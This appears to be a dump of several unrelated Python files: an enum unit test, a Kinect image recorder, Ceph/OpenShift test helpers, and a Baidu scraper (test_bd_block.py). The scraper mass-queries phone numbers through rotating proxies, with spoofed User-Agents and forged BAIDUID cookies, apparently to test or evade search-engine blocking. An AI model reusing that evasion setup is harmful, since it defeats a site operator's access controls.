defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
test_bd_block.py | #coding:utf-8
import threading
import multiprocessing
import requests
import time
import logging
import random
import time
import sys
import uuid
from lxml import etree
fm = "%(asctime)s-%(filename)s-%(threadName)s-%(funcName)s-%(levelname)s-%(lineno)d:\t%(message)s"
logging.basicConfig(filename='test_web.log',level=logging.INFO, format=fm)
logger = logging.getLogger()
class WEB(object):
class_flag = "web"
agent_list = [
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
]
def bd_get(self, tel=10086, proxy=None):
process_name = multiprocessing.current_process().name
content = ''
url = f'http://www.baidu.com/s?wd={tel} 地址'
try:
query_header = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"User-Agent":random.choice(WEB.agent_list),
}
query_cookie = {
"BAIDUID": "%s:FG=1" % str(uuid.uuid4()).replace('-', '').upper(),
"PSTM": "%s" % (int(time.time())),
}
resp = requests.get(url,
headers=query_header,
timeout=5,
proxies=proxy,
cookies=query_cookie
# verify=False,
)
if resp.status_code == 200:
content = resp.text
content_name = f"./html/{process_name}-{tel}.html"
encoding = resp.encoding
with open(content_name, 'w', encoding=encoding) as wh:
wh.write(content)
else:
print('error')
except Exception as e:
print(e)
def s60_get(self, formated_tel, proxy=None):
content = ''
find_url = ''
url = f'https://www.so.com/s?q=7788'
query_header = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"User-Agent": random.choice(WEB.agent_list),
}
try:
resp = requests.get(url,
headers=query_header,
timeout=5,
proxies=proxy,
# verify=False,
)
if resp.status_code == 200:
content = resp.text
find_url=url
except Exception as e:
print(e)
return content, find_url
def run(proxy=None, tel_header=''):
# all_tel = ['0536-2081111', '0429-4447001', '0391-7291224', '0731-86240655', '023-68088882', '0769-82283187', '029-89581675', '025-58377516', '0371-27978107', '0411-88466794', '0372-2188521', '021-64191703', '0759-6633355', '0591-83621655', '0451-57753888', '0511-86857186', '0792-8906059', '0477-6213200', '010-56263335', '0576-87721558', '0558-2901266', '0512-62837080', '0576-88587778', '0934-6608777', '0760-85331222', '0519-87222787', '0797-6368368', '0431-88558689', '025-84930942', '0731-82764958', '0755-26900060', '0356-6866001', '0551-68821054', '021-61900502', '025-84896440', '0557-3053321', '0416-2199966', '0316-5994005', '0731-88938586', '0317-7105896', '0533-7691090', '0755-29651666', '0791-83812048', '0357-2317171', '0591-24377106', '0574-87935837', '0371-55605888', '0531-82767663', '0755-83561317', '028-89993808', '024-52673448', '0771-5552815', '0769-22184688', '0577-88628398', '021-61206688', '0359-5035510', '028-85754413', '0592-5738999', '0738-1558126', '0873-3045110', '0752-3277895', '0370-3133501', '0311-83862838', '0516-88258138', '010-85180966', '021-50801060', '0577-65766918', '0349-5028008', '0573-85851218', '029-84491889', '0769-83314860', '024-22837758', '0591-87270629', '0595-83050088', '0354-6762958', '010-89733256', '0473-8187549', '0511-88795242', '0755-27309102', '0871-67151788', '0379-65163888', '0791-85231988', '0391-3532315', '0519-88993351', '0527-80691042', '0372-5219088', '0372-8831238', '0755-84705888', '0510-85988888', '0355-5807720', '0371-23336631', '0512-86858999', '0370-2831898', '020-32223080', '029-88216989', '0371-58579109', '0755-82960345', '022-26980351', '021-62115900', '0755-89888888']
all_tel = [f"{tel_header}%03d"%i for i in range(100) ]
w = WEB()
for t in all_tel:
w.bd_get(t, proxy)
if __name__ =="__main__":
proxy_list = [{"http":f"http://squidsz{i}.dianhua.cn:8080", "https":f"https://squidsz{i}.dianhua.cn:8080"} for i in range(61, 71)]
proxy_num = len(proxy_list)
thread_num = proxy_num * 10
st = time.time()
tel_header = ['023-680%02d'%i for i in range(thread_num)]
# print(tel_header)
t_list = [multiprocessing.Process(target=run, args=(proxy_list[i%proxy_num],tel_header[i])) for i in range(thread_num)]
for t in t_list:
t.start()
for t in t_list:
t.join()
et = time.time()
count = thread_num * 100
cost = et-st
print("thread_num: %d, total tps:%.3f, single tps:%.3f" % (thread_num, count/cost, 100/cost))
|
record_kinect_to_img.py | from navirice_get_image import KinectClient
from navirice_helpers import navirice_img_set_write_file
from navirice_helpers import navirice_image_to_np
from navirice_helpers import navirice_ir_to_np
import navirice_image_pb2
from tkinter import *
import cv2
import numpy as np
from threading import Thread
HOST = '127.0.0.1' # The remote host
PORT = 29000 # The same port as used by the server
class Window(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.init_window()
def init_window(self):
self.should_pull = True
self.should_record = False
self.should_run = True
self.session_name = "default"
self.last_count = 0
self.master.title("NAVIRICE_RECORDER")
recordButton = Button(self, text="RECORD", command=self.record)
recordButton.place(x=5, y=0)
self.session_text = Text(self, height=1, width=20)
self.session_text.place(x=5, y=30)
self.session_text.insert(END, self.session_name)
self.canvas = Canvas(self, height=30, width=30)
self.print_states()
self.pack(fill=BOTH, expand=1)
thread = Thread(target = self.thread_stream)
thread.deamon = True
thread.start()
def print_states(self):
self.canvas.delete()
fill = '#f00'
if(self.should_record):
fill = '#0f0'
self.canvas.create_oval(4, 0, 25, 25, outline="#000", fill=fill)
self.canvas.pack(fill=BOTH, expand=1)
self.canvas.place(x = 100, y = 0)
def record(self):
self.should_record = not self.should_record
self.print_states()
name = self.session_text.get("1.0",END)
if(len(name)):
self.session_name = name
def kill(self):
self.should_run = False
def thread_stream(self):
kc = KinectClient(HOST, PORT)
kc.navirice_capture_settings(False, True, True)
while(self.should_run):
img_set = None
if(self.should_pull):
img_set, self.last_count = kc.navirice_get_image()
if(img_set != None and img_set.IR.width > 0 and img_set.Depth.width > 0):
if self.should_record:
#processThread =Thread(target=navirice_img_set_write_file, args=[self.session_name, img_set, self.last_count])
#processThread.start()
navirice_img_set_write_file(self.session_name, img_set, self.last_count)
cv2.imshow("IR", navirice_ir_to_np(img_set.IR))
cv2.imshow("DEPTH", navirice_image_to_np(img_set.Depth))
if cv2.waitKey(1) & 0xFF == ord('q'):
print("q pressed in cv window")
del img_set
def main():
root = Tk()
root.geometry("170x65")
root.attributes('-type', 'dialog')
app = Window(root)
def on_quit():
app.kill()
exit()
root.protocol("WM_DELETE_WINDOW", on_quit)
root.mainloop()
if __name__ == "__main__":
main()
|
helpers.py | """
Helper functions file for OCS QE
"""
import logging
import re
import datetime
import statistics
import os
from subprocess import TimeoutExpired, run, PIPE
import tempfile
import time
import yaml
import threading
from ocs_ci.ocs.ocp import OCP
from uuid import uuid4
from ocs_ci.ocs.exceptions import (
TimeoutExpiredError,
UnexpectedBehaviour,
UnavailableBuildException
)
from concurrent.futures import ThreadPoolExecutor
from ocs_ci.ocs import constants, defaults, ocp, node
from ocs_ci.utility import templating
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.exceptions import CommandFailed, ResourceWrongStatusException
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import TimeoutSampler, ocsci_log_path, run_cmd
from ocs_ci.framework import config
logger = logging.getLogger(__name__)
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
return f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get('metadata').get('name')
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create resource {resource_name}"
)
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info(f"Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None, pvc_name=None,
do_reload=True, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None, pod_dict_path=None, sa_name=None, dc_deployment=False,
raw_block_pv=False, raw_block_device=constants.RAW_BLOCK_DEVICE, replica_count=1,
pod_name=None, node_selector=None
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if interface_type == constants.CEPHBLOCKPOOL:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(
f'test-{interface}', 'pod'
)
pod_data['metadata']['name'] = pod_name
pod_data['metadata']['namespace'] = namespace
if dc_deployment:
pod_data['metadata']['labels']['app'] = pod_name
pod_data['spec']['template']['metadata']['labels']['name'] = pod_name
pod_data['spec']['replicas'] = replica_count
if pvc_name:
if dc_deployment:
pod_data['spec']['template']['spec']['volumes'][0][
'persistentVolumeClaim'
]['claimName'] = pvc_name
else:
pod_data['spec']['volumes'][0]['persistentVolumeClaim']['claimName'] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path == constants.FEDORA_DC_YAML:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'template').get('spec').get('volumes')[0].get('name')}
]
del pod_data['spec']['template']['spec']['containers'][0]['volumeMounts']
pod_data['spec']['template']['spec']['containers'][0]['volumeDevices'] = temp_dict
elif pod_dict_path == constants.NGINX_POD_YAML:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'containers')[0].get('volumeMounts')[0].get('name')}
]
del pod_data['spec']['containers'][0]['volumeMounts']
pod_data['spec']['containers'][0]['volumeDevices'] = temp_dict
else:
pod_data['spec']['containers'][0]['volumeDevices'][0]['devicePath'] = raw_block_device
pod_data['spec']['containers'][0]['volumeDevices'][0]['name'] = pod_data.get('spec').get('volumes')[
0].get('name')
if node_name:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeName'] = node_name
else:
pod_data['spec']['nodeName'] = node_name
if node_selector:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeSelector'] = node_selector
else:
pod_data['spec']['nodeSelector'] = node_selector
if sa_name and dc_deployment:
pod_data['spec']['template']['spec']['serviceAccountName'] = sa_name
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind='pod', namespace=namespace)).wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=pod_name + '-1-deploy',
resource_count=0, timeout=180, sleep=3
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get('metadata').get('name')
logger.info(f'Creating new Pod {pod_name} for test')
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create Pod {pod_name}"
)
return pod_obj
def create_project():
"""
Create a project
Returns:
OCP: Project object
"""
namespace = create_unique_resource_name('test', 'namespace')
project_obj = ocp.OCP(kind='Project', namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(
constants.CSI_RBD_SECRET_YAML
)
secret_data['stringData']['userID'] = constants.ADMIN_USER
secret_data['stringData']['userKey'] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(
constants.CSI_CEPHFS_SECRET_YAML
)
del secret_data['stringData']['userID']
del secret_data['stringData']['userKey']
secret_data['stringData']['adminID'] = constants.ADMIN_USER
secret_data['stringData']['adminKey'] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data['metadata']['name'] = create_unique_resource_name(
f'test-{interface}', 'secret'
)
secret_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
return constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(pool_name=None, failure_domain=None, verify=True):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cbp'
)
)
cbp_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data['spec']['failureDomain'] = failure_domain or get_failure_domin()
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(cbp_obj.name), (
f"Block pool {cbp_obj.name} does not exist"
)
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cfs'
)
)
cfs_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(cfs_data.name), (
f"File system {cfs_data.name} does not exist"
)
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
if interface_type == constants.CEPHBLOCKPOOL:
base_sc = OCP(
kind='storageclass',
resource_name=constants.DEFAULT_STORAGECLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
base_sc = OCP(
kind='storageclass',
resource_name=constants.DEFAULT_STORAGECLASS_CEPHFS
)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type, interface_name, secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE, sc_name=None,
provisioner=None
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(
constants.CSI_RBD_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data['provisioner'] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(
constants.CSI_CEPHFS_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data['parameters']['fsName'] = get_cephfs_name()
sc_data['provisioner'] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data['parameters']['pool'] = interface_name
sc_data['metadata']['name'] = (
sc_name if sc_name else create_unique_resource_name(
f'test-{interface}', 'storageclass'
)
)
sc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters']['clusterID'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['reclaimPolicy'] = reclaim_policy
try:
del sc_data['parameters']['userid']
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name, pvc_name=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None, do_reload=True, access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['name'] = (
pvc_name if pvc_name else create_unique_resource_name(
'test', 'pvc'
)
)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if volume_mode:
pvc_data['spec']['volumeMode'] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name, namespace, number_of_pvc=1, size=None, do_reload=False,
access_mode=constants.ACCESS_MODE_RWO
):
"""
Create one or more PVC
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
Returns:
list: List of PVC objects
"""
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
volume_mode = 'Block'
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name, size=size, namespace=namespace,
do_reload=do_reload, access_mode=access_mode, volume_mode=volume_mode
) for _ in range(number_of_pvc)
]
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph osd lspools'
):
logger.info(f'POOLS are {pools}')
for pool in pools:
if pool_name in pool.get('poolname'):
return True
except TimeoutExpiredError:
return False
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph auth get-key client.admin')
return out['key']
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph fs ls')
return out[0]['data_pools'][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get('metadata').get('name'):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info(
"Filesystem %s was not create at Openshift Side", fs_name
)
return False
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph fs ls'
):
for out in pools:
result = out.get('name')
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result['items']
storageclass = [
item.get('metadata').get('name') for item in sample if (
(item.get('metadata').get('name') not in constants.IGNORE_SC_GP2)
and (item.get('metadata').get('name') not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""""
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result['items']
pool_list = [
item.get('metadata').get('name') for item in sample
]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
cfs_obj = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = cfs_obj.get()
return result['items'][0].get('metadata').get('name')
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f'podman pull {image_name}']
)
def run_io_with_rados_bench(**kw):
""" A task for radosbench
Runs radosbench command on specified pod . If parameters are
not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
**kw: Needs a dictionary of various radosbench parameters.
ex: pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get('ceph_pods') # list of pod objects of ceph cluster
config = kw.get('config')
role = config.get('role', 'client')
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get('idx', 0)
client = clients[idx]
op = config.get('op', 'write')
cleanup = ['--no-cleanup', '--cleanup'][config.get('cleanup', True)]
pool = config.get('pool')
block = str(config.get('size', 4 << 20))
time = config.get('time', 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
